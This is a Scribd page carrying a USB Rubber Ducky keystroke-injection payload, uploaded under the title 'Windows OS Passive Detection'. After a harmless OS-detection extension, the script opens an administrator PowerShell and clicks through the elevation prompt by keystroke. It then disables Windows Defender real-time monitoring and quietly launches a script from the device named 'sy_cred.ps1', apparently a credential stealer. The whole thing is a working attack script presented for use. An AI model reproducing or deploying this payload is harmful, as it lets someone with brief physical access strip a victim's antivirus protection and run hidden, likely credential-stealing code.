Scribd
Upload
12 views2 pages

Windows OS Passive Detection

Uploaded by

slaxxer12
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
12 views2 pages

Windows OS Passive Detection

Uploaded by

slaxxer12
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 2

ATTACKMODE HID STORAGE

EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben

REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.

USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM

REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7

$_OS = #NOT_WINDOWS

VAR $MAX_TRIES = #MAX_WAIT


WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF

REM_BLOCK EXAMPLE USAGE AFTER EXTENSION


IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION

DEFINE #DUCKY_DRIVER_LABEL DUCKY


DEFINE #PS1 sy_cred.ps1

IF ($_OS == WINDOWS )THEN

DELAY 200
REM -----open Powershell as Admin
GUI r
DELAY 200
STRING powershell
CTRL-SHIFT ENTER
DELAY 400
LEFT
DELAY 150
ENTER
DELAY 500
STRINGLN_POWERSHELL

$duckletter = (Get-CimInstance -ClassName Win32_LogicalDisk | Where-Object


{ $_.VolumeName -eq '#DUCKY_DRIVER_LABEL' }).DeviceID;cd $duckletter
Set-MpPreference -DisableRealtimeMonitoring $true
Start-Process powershell.exe -ArgumentList "-NoProfile -WindowStyle Hidden -
File #PS1" -WindowStyle Hidden
exit

END_STRINGLN

END_IF

You might also like